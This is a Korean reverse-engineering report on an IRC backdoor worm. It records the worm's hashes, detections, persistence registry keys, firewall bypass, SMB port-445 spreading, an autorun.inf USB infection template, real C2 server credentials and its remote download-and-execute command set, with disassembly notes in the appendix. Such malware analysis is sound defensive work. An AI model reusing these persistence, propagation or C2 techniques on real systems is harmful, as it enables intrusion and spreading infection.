Win32/Backdoor.Worm.IRCBot.23552 상세분석보고서 최초작성 : 2011년 05월 09일 1 차수정 : 2011년 05월 23일 작성자 : 김부성 홈페이지 : http://www.chosik.com 이메일 : kbs6880@gmail.com
기본정보 종류 Backdoor 위험도 높음 감염경로 이동식디스크, 보안취약점 증상 원격코드실행 플랫폼 Windows 크기 23,552byte 암호화여부 문자열암호화 팩킹 kkrunchy MD5 21FB327E99105F1D2816CE9731770695 SHA1 5EA7693143A2F66BC64213DE21CB939C216EF03B VirusTotal 정보 Antivirus Version Result AhnLab- V3 2011.05.09.00 Win32/ IRCBot.worm.23552.G AntiVir 7.11.7.179 TR/ Dropper.Gen Antiy- AVL 2.0.3.7 Backdoor/ Win32.IRCBot.gen Avast 4.8.1351.0 Win32:IRCBot- DMJ Avast5 5.0.677.0 Win32:IRCBot- DMJ AVG 10.0.0.1190 IRC/ BackDoor.SdBot4.RAY BitDefender 7.2 IRC- Worm.Generic.5032 CAT- QuickHeal 11.00 Backdoor.IRCBot.jhz ClamAV 0.97.0.0 Trojan.IRCBot- 3783 Commtouch 5.3.2.6 W32/ Ircbot.ABZ Comodo 8631 - DrWeb 5.0.2.03300 BackDoor.IRC.Sdbot.4844 esafe 7.0.17.0 Win32.TRCrypt.XPACK etrust- Vet 36.1.8312 Win32/ IRCBot.MG F- Prot 4.6.2.117 W32/ Ircbot.ABZ Fortinet 4.2.257.0 W32/ IRCBot.JHZ!tr.bdr GData 22 IRC- Worm.Generic.5032 Ikarus T3.1.1.103.0 Net- Worm.Win32.Kolab Jiangmin 13.0.900 Backdoor/ IRCBot.fpl K7AntiVirus 9.102.4584 Backdoor Kaspersky 9.0.0.837 Net- Worm.Win32.Kolab.dww McAfee 5.400.0.1158 W32/ Sdbot.dr!ADA37D45 McAfee- GW- Edition 2010.1D W32/ Sdbot.dr!ADA37D45 Microsoft 1.6802 Worm:Win32/ Neeris.AU NOD32 6105 Win32/ IRCBot.AMC Norman 6.07.07 W32/ Smalltroj.dam Panda 10.0.3.5 W32/ Ircbot.CNJ.worm PCTools 7.0.3.5 Backdoor.Sdbot!sd6 Prevx 3.0 High Risk System Back Door Rising 23.56.06.05 Trojan.Win32.Generic.11ED3EE4 Sophos 4.65.0 W32/ IRCbot- AEL SUPERAntiSpyware 4.40.0.1006 Trojan.Agent/ Gen.Process Symantec 20101.3.2.89 W32.Spybot.Worm TheHacker 6.7.0.1.191 W32/ Kolab.dww TrendMicro 9.200.0.1012 WORM_NEERIS.SM TrendMicro- HouseCall 9.200.0.1012 WORM_NEERIS.SM VBA32 3.12.16.0 Malware- Cryptor.General.6 VIPRE 9229 Backdoor.IRCBot ViRobot 2011.5.9.4451 Backdoor.Win32.IRCBot.23552.P VirusBuster 13.6.343.0 Backdoor.IRCBot.ADZR - 2-
요약 이악성코드는이동식디스크와네트워크를통해자신을전파하며, 시스템폴더에자신을 복사하고레지스트리를조작하여시작프로그램과방화벽정책을수정한다. 또한, 특정서 버에접속을시도하며서버의원격명령을수행한다. 상세정보 1악성코드가실행되면파일의위치를확인하고, 자신을 %system% 폴더에 smsc.exe라는 파일명으로복사하고 System, Hidden, Read 속성을설정한다. 2다음레지스트리를등록한다. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ WSSVC(c:\win dows\system\smsc.exe) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Mini mal\svcwinspoo L\Default(Service) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Netw ork\svcwinspoo L\Default(Service) 3 방화벽에자신을예외등록한다. 4%system32% 폴더에 sysdrv32.sys 파일을생성하고 System, Hidden 속성을설정한다. 5sysdrv32 서비스를등록한다. - 3-
6 임의의포트를열고자기자신을배포할준비를한다. 7 같은네트워크대역의취약호스트를탐색하고감염시킨다. 8이동식디스크연결시자기자신을 p.exe라는파일명으로감염시키고 autorun.inf 파일을 생성한뒤 System, Hidden, Read 속성을설정한다. 9IRC Server(b.vspcord.com) 에접속하고해커의명령을기다린다. - 4-
실행순서도 - 5-
Server 정보 1 요약정보서버작동여부기본정보추가정보 미작동 서버종류 IRC Server 도메인 b.vspcord.com IP 주소 211.233.91.10 Port 번호 988 패스워드 h4xg4ng 채널명 #lox 2 명령의실행 감염 PC의명령실행은접속된 IRC Server의채널 TOPIC 값을전달받음으로써실행된다. 3 명령의입력 해커는 IRC Server의채널에접속하여 TOPIC 값을 $dec(! 명령 ) 의포맷으로입력하여감염 PC 에게명령을전달한다. ex:)/topic #lox $dec(!s.start 10 5 3 -r -e) 4 명령표 명령포맷 설명 open [ 파일명] 파일을백그라운드로실행한다. r3 SVCWINSPOOL 서비스를실행한다. 취약호스트탐색쓰레드를실행한다. 옵션 설명 [0-128] 쓰레드갯수 s.start [0-128] [1-60] [1-3] [1-60] 탐색텀 ( 초단위) [1-3] 감염 IP 네트워크대역 (A,B,C 클래스) [-r -s] [-e] [-r] 네트워크호스트대역을 x로저장 [-s] 네트워크호스트대역을 0으로저장 [-e] 네트워크대역계산에사용할 IP 주소에공인 IP 주소를이용한다. ( 미설정시사설 IP) s.stop 취약호스트탐색쓰레드를종료한다. http [stop] stop 인자가전달되면 29A0CA1C 위치의메모리값을 0 으로세팅한다. ( 정확한동작은미확인) URL 주소로부터파일을내려받아실행시킨다. wget [URL 주소] [-n] 옵션 설명 [-n] IRC Server 접속을종료한다. 마무리 리버싱을흥미를가지고공부하면서저를괴롭히던이악성코드를직접분석해내고말겠다는각오아래부족한실력으로분석을시작했습니다. 첫리버싱결과물이고부족한점이많아잘못된분석이많이있을지도모르지만저처럼리버싱을시작하고자하는분들에게조금이나마도움이되는자료가되었으면좋겠습니다. 추가1 > 많은분들이처음작성된보고서내용에대해관심을가지고지적해주셨던부분에 대하여미약하게나마보완하여수정된보고서를작성하였습니다. 역시나제실력이미약하 여 IRC Server의명령처리에대해완벽하게알아내지는못하였지만어설프게나마명령표 도작성되었습니다. 보고서에대한지적사항또는추가사항은제블로그에남겨주시면감 사히받아들이겠습니다. - 6-
부록 리버싱분석메모 (Unpacked) 개인적으로악성코드를분석하면서간단하게메모했던자료로써, 박죽일수있으니참고용으로만사용하시기바랍니다. 내용이지저분하고뒤죽 ============================ 최초실행파일======================= ===== 29A05F7D 최초메인루틴 29A0607E 자기복제루틴을실행한다.(29A068F0) 29A06091 현재실행되고있는프로세스가 c:\windows\system\smsc.exe인지확 인하고맞다면복제파일실행루틴으로점프한다. 29A0609F 29A060ED 레지스트리등록루틴을실행한다.(29A066E9) c:\windows\system\smsc.exe 를실행한다. 29A0612C 자기자신을종료한다. 29A068F0 ( 최초자기복제루틴) 실행폴더->SYSTEM 폴더\smsc.exe 29A06990 현재실행되고있는프로세스가 c:\windows\system\smsc.exe인지확 인하고맞다면파일복사루틴을건너뛴다. 29A069AE 속성을일반파일로변경한다. c:\windows\system\smsc.exe이존재하는지확인하고존재하면파일 29A069D8 자기자신을 c:\windows\system\smsc.exe 로복사한다. 29A06A1D 을설정한다. c:\windows\system\smsc.exe 파일에읽기전용, 숨김, 시스템파일속성 29A066E9 ( 레지스트리등록루틴) 29A06755 윈도우시작시자동실행이되도록 HKLM\SOFTWARE\Microsoft\Win dows\currentversion\run에 WSSVC라는이름으로 c:\windows\system\smsc. exe 를등록 29A06820 HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Mini mal에 SVCWINSPOOL 라는이름으로서브키를생성한다. 29A06848 HKLM\SYSTEM\CurrentControlSet\Control\SafeB oot\minimal\s VCWINSPOOL의기본값을 Service 로설정한다. 29A068AB HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Netw ork에 SVCWINSPOOL 라는이름으로서브키를생성한다. 29A068D3 HKLM\SYSTEM\CurrentControlSet\Control\SafeB oot\network \SVCWINSPOOL의기본값을 Service 로설정한다. - 7-
=====================c:\windows\system\smsc.exe===================== 29A06132 복제파일실행루틴 29A06140 방화벽추가루틴을실행한다.(29A0705A) 29A0615B 메인루틴쓰레드를생성한다.(29A0617F) 29A0616A 메인루틴이종료되기를기다린다.(29A0617F) 29A06171 핸들을종료하고프로세스실행을종료한다. 29A0705A ( 방화벽추가루틴) 29A070EF 현재운영체제가 WinXP SP2 인지확인한다. (SP2 가아니면루틴종료) 29A07164 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\S haredaccess\parameters\firewallpolicy\standardprofi le\authorizedapplications \List 에자기자신을추가하여방화벽에예외처리한다. ( 값 : C:\WINDOWS\system\smsc.exe:*:Microsoft Enabled) 29A0617F 메인루틴 29A062BE 파일배포쓰레드에서 Listen 포트로사용할값을랜덤으로생성한다. 29A062EB 29A062FF 29A0632F sysdrv32.sys 관련쓰레드를생성한다.(29A01000) 파일배포쓰레드를생성한다.(29A01CA4) 네트워크대역계산루틴을실행한다.(29A027E7) 29A0636E 취약호스트탐색& 감염쓰레드실행쓰레드를생성한다.(29A025B7) 29A0639F USB 감염( 메인) 쓰레드를생성한다.(29A034F4) 29A063C5 IRC Server 접속루틴을실행한다.(29A04A39) 29A063D0 IRC Server 응답처리루틴(?) 을실행한다.(29A04E37) 29A01000 sysdrv32.sys 관련쓰레드 29A0108F 서비스팩이없는지확인한다. 29A010A3 29A010EE 20A010FF 29A01104 29A0111B 서비스팩1 인지확인한다. sysdrv32.sys 생성루틴을실행한다.(29A01159) 서비스오픈루틴을실행한다.(29A0139E) SCM 핸들오픈루틴을실행한다.(29A011AB) 서비스생성루틴을실행한다.(29A011F9) 29A01159 sysdrv32.sys 생성루틴 29A01185 system32\drivers 폴더에 sysdrv32.sys 파일을생성한다. 29A01196 sysdrv32.sys 파일에숨김, 시스템파일속성을설정한다. 29A011A1 5초간 Sleep 한다. - 8-
29A0139E 서비스오픈루틴 29A013BF sysdrv32 서비스를오픈한다. 서비스명 :sysdrv32 접근권한 :ALLUSERSPROFILE=C:\Documents and Settings\All Users 29A011AB SCM 핸들오픈루틴 29A011B8 SCM 핸들을오픈한다. 29A011F9 서비스생성루틴 29A0124D 29A012A9 OP 10000 sysdrv32 서비스를오픈한다. sysdrv32 서비스를생성한다. ServiceName = "sysdrv32" DisplayName = "Play Port I/O Driver" DesiredAccess = SERVICE_QUERY_STATUS SERVICE_START SERVICE_ST ServiceType = SERVICE_KERNEL_DRIVER StartType = SERVICE_DEMAND_START ErrorControl = SERVICE_ERROR_NORMAL BinaryPathName = "C:\WINDOWS\system32\drivers\sysdrv32.sys" LoadOrderGroup = "SST wanport drivers" ptagid = NULL pdependencies = NULL ServiceStartName = NULL Password = NULL 29A012F2 서비스실행루틴 29A0131A 29A0136A sysdrv32 서비스를오픈한다. sysdrv32 서비스를실행한다. 29A01CA4 ( 파일배포쓰레드) 29A01CDE 소켓을생성한다. 29A01CF7 소켓에 SO_REUSEADDR 속성을설정한다. 29A01D19 인자로넘어온랜덤값을이용하여포트를설정한다. 29A01D2A 소켓을바인딩한다. 29A01D3B 설정된포트로 Listen 한다. - 9-
29A01D82 application/octet-stream 값을저장한다. 29A01DA2 현재파일명을읽어와서 EBP-430(E6FB84) 에저장한다. 29A01DBA _EXISTING 모드로오픈한다. 읽어들인파일명을이용하여 GENERIC_READFILE_SHARE_READ,OPEN 29A01DD2 파일의크기를읽어온다. 29A01DD9 파일의크기를 EBP-20(E6FF94) 에저장한다. 29A01DDC 오픈한파일의핸들을종료한다. 29A01DF8 날짜포맷을 EBP-24(E6FE90) 에저장한다. 29A01E45 감염 PC 의접속을기다린다. 29A01F04 패킷을읽어들인다. 29A01F6C 패킷의내용에 "GET " 이포함되는지확인한다. 29A01FEC 응답패킷문자열을생성하여 EBP-19C0(E6E5F4) 에저장한다. HTTP/1.0 200 OK Server: private Cache-Control: no-cache,no-store,max-age=0 pragma: no-cache Content-Type: application/octet-stream Content-Length: 23552 Accept-Ranges: bytes Date: Thu, 07 Apr 2011 16:30:12 GMT Last-Modified: Th"... 29A0200F 생성한패킷을전송한다. 29A02032 자기자신을 GENERIC_READFILE_SHARE_READ,OPEN_EXISTING 모드 로오픈한다. 29A0204A 파일의크기를구한다. 29A02092 파일을읽어들인다. 29A020A6 데이터를전송한다. 29A020CE 파일핸들을종료한다. 29A020DF 소켓을종료한다. 29A020E5 다시새로운접속을기다리기위해 29A01E23 으로점프한다. 29A027E7 첫번째인자 : 네트워크대역계산루틴 Host IP 주소 두번째인자 : 1= 나머지 x 채움 세번째인자 : 0= 나머지 0 채움 네트워크대역 29A0280E EBP-2C(B6FC68) 에현재 PC의 IP 주소저장한다. 29A02824 저장한 IP 주소를클래스별로분할한다. 29A02829 EBP-1C(B6FC78) 에 A 클래스값저장한다. 29A02841 D 클래스까지반복하면서각클래스값을저장한다. EBP-18(B6FC7C):B 클래스, EBP-14(B6FC80):C 클래스, EBP-10(B6FC84):D 클래스 - 10-
29A025B7 취약호스트탐색& 감염쓰레드실행쓰레드 29A02653 취약호스트탐색& 감염쓰레드를생성한다.(29A02509) 29A02509 취약호스트탐색& 감염쓰레드 쓰레드인자 : IP 대역 29A02560 랜덤 IP 생성루틴을실행하여접속을시도할 IP주소를랜덤으로생성한 다.(29A02454) 29A02574 445 포트스캔루틴을호출하여생성된 IP주소의 445포트가열려있는지 확인한다.(29A026E5) 29A02581 생성된 IP 를변환한다. 29A02588 취약호스트감염루틴을호출하여찾아낸취약한 IP 를감염시킨다.(29A0 2784) 29A02593 속도조절을위하여 2초간 Sleep 한다. 29A025A3 29A0C5F4가 0 일때까지계속반복한다. 29A026E5 445 포트스캔루틴 첫번째인자 : 연결할 IP 주소 두번째인자 : select 응답대기시간 29A026FD 29A02725 29A02740 29A02769 29A02772 소켓생성 445번포트설정 연결 응답대기 연결해제 29A02454 랜덤 IP 생성루틴 첫번째인자 : 네트워크대역 두번째인자 : 현재몇번째 IP 인지 11AFF4C 11AFF50 11AFF54 11AFF48 A 클래스변수(EBP-C) B 클래스변수(EBP-8) C 클래스변수(EBP-4) D 클래스변수(EBP-10) 29A024DA 첫번째 rand 결과를 C 클래스변수(EBP-4) 에저장한다. 29A024DD D클래스변수값을 EAX 에저장한다. 29A024E0 D 클래스변수가비었는지확인한다. 29A024E2 비어있지않으면 rand 건너뛴다. 29A024E6 두번째 rand 결과를좌측 8번시프트 - 11-
29A024E9 시프트한두번째결과와첫번째결과더한다. 29A024EC ECX에 A 클래스값로드한다. 29A024F0 결과더한값을다시좌측 8번시프트 29A024F3 시프트한값에 B 클래스값더한다. 29A024F6 다시좌측 8번시프트 29A024F9 시프트한값에 ECX에저장해두었던 A 클래스값더한다. 29A0C5F0에랜덤 IP주소를저장 29A02784 취약호스트감염루틴 29A02794 29A027A1 29A027A8 139 번포트가열렸는지확인하고연결을시도한다.(29A0147A) 공유폴더에연결을시도한다.(29A02196) 파일전송루틴을실행한다. (29A02AF4) 29A02196 공유관련작업을함 29A02217 \\IP 주소\IPC$ 문자열저장 29A0229A \\IP 주소\pipe\spoolss 바인딩 29A022C1 ncacn_cp:192.168.2.100[\\pipe\\spoolss] 29A02AF4 파일전송루틴 29A02DFC 랜덤으로생성된두자리숫자.scr 저장 29A02E69 "http://ip 주소:29A01CA4 에서오픈한포트/x" 문자열저장 29A034F4 USB 감염 ( 메인) 29A0352B 29A03538 10 초간대기한다. USB 감염루틴을실행한다.(29A03760) 29A0353E 반복감염을위하여 Sleep 함수부분으로점프한다. 29A03760 USB 감염루틴 29A03771 논리드라이버들의정보를얻어온다. 29A0378F 이동식디스크인경우파일을복사한다. 29A037BA Autorun & 자기자신파일복사루틴을실행한다.(29A03540) 29A037C8 다음논리드라이버를읽어들인다. - 12-
29A03540 첫번째인자 두번째인자 : : Autorun & 원본파일경로 복사위치 자기자신파일복사루틴 29A035F6 이동식디스크에 p.exe 파일이존재하는지확인한다. 29A03612 이동식디스크에 autorun.inf 파일을생성한다. 29A03636 29A03667 29A0368F 29A036B0 29A036DE 29A0370C autorun.inf 파일에다음내용을입력 [autorun] shellexecute=p.exe action=open folder to view files shell\default=open shell\default\command=p.exe shell=default 29A0372C 자기자신을이동식디스크에 p.exe 라는파일명으로복사한다. 29A03741 p.exe 파일에읽기전용& 숨김& 시스템파일속성을설정한다. 29A0374C autorun.inf 파일에읽기전용& 숨김& 시스템파일속성을설정한다. 29A04A39 IRC Server 접속루틴 29A04A77 29A056ED 루틴에서 [00-KOR-XP-3312752] 생성 29A04AFB b.vspcord.com의 IP 주소질의 29A04B20 29A04B39 29A04C30 29A04C6A 29A04CAA 988 서버연결 포트설정 IRC 명령전송루틴을실행하여패스워드를전달한다.(29A04DE2) PASS h4xg4ng IRC 명령전송루틴을실행하여닉네임을전달한다.(29A04DE2) NICK 생성된닉네임 IRC 명령전송루틴을실행하여유저정보를전달한다.(29A04DE2) USER 유저정보 29A04DE2 첫번째인자 나머지인자 : IRC : IRC 명령전송루틴 명령포맷 포맷에들어갈문자열 29A04DFF 두인자를합쳐서하나의문자열로만든다. 29A04E28 완성된명령을 IRC Server 로전송한다. 29A04E37 IRC Server 명령수신루틴 29A04E60 서버의응답을수신한다. 29A04E8D 응답이정상적으로수신되었으면패킷처리루틴을실행한다.(29A050A1) - 13-
29A050A1 패킷처리루틴 29A050C3 처리할데이터가남아있지않으면종료한다. 29A050CD 데이터처리루틴을실행한다. 29A050E1 데이터처리루틴 29A053B1 IRC 명령전송루틴을실행하여채널에접속한다.(29A04DE2) JOIN #lox 29A05462 TOPIC 명령처리루틴을실행한다.(29A04E9F) 29A04E9F 첫번째인자 두번째인자 세번째인자 : 1 TOPIC 명령처리루틴 : 서버에서전달된문자열( 명령) : 명령전송자닉네임 29A04F3B 전달된문자열에서채널명을제외한명령코드를추출한다. 29A04F93 29A0508D $dec() 안의내용을추출한다. 서버명령처리루틴을실행한다.(29A039E1) 29A039E1 서버명령처리루틴첫번째인자 : 명령문자열두번재인자 : B6F7EC 29A03A62 실제서버명령처리루틴을실행한다.(29A03A75) 29A03A75 실제서버명령처리루틴 29A03A91 전달된명령이 open 명령인지확인한다. 29A03AB4 open 이라면인자로전달된파일을숨김속성으로실행한다. 29A03B04 전달된명령이 s.start 명령인지확인한다. 29A03C61 전달된인자를참조하여취약호스트탐색& 감염쓰레드실행쓰레드를실 행한다.(29A025B7) 29A03C98 전달된명령이 s.stop 명령인지확인한다. 29A03CA2 쓰레드종료루틴을실행하여실행중인취약호스트탐색& 감염쓰레드실 행쓰레드를모두종료한다.(29A033EC) 29A03CBE 전달된명령이 http 명령인지확인한다. 29A03CE6 전달된인자가 stop 인지확인한다. 29A03CFA 전달된인자가 stop이면 29A0CA1C를 0으로설정하고아니면 1로설정한 다. - 14-
29A03D3E 전달된명령이 wget 인지확인한다. 29A03DD6 파일다운로드 & 실행쓰레드을실행한다. 29A06D06 파일다운로드 & 실행쓰레드 29A06D76 다운로드받은파일을저장할 Temp 폴더경로를저장한다. 29A06DF0 를실행하여인자로전달된 url 로부터파일을다운로드받는다. 29A06DB6 Temp 로다운로드받은파일위치를저장한다. 29A06DF0 폴더경로와랜덤함수를실행하여얻은파일명을합하여최종적으 URL 로부터파일을다운로드받는다. 29A06E1E 정상적으로다운로드받았으면다운로드받은파일을실행한다. 29A06E60 -n 옵션이설정되어있으면 IRC Server 접속을종료한다. - 15-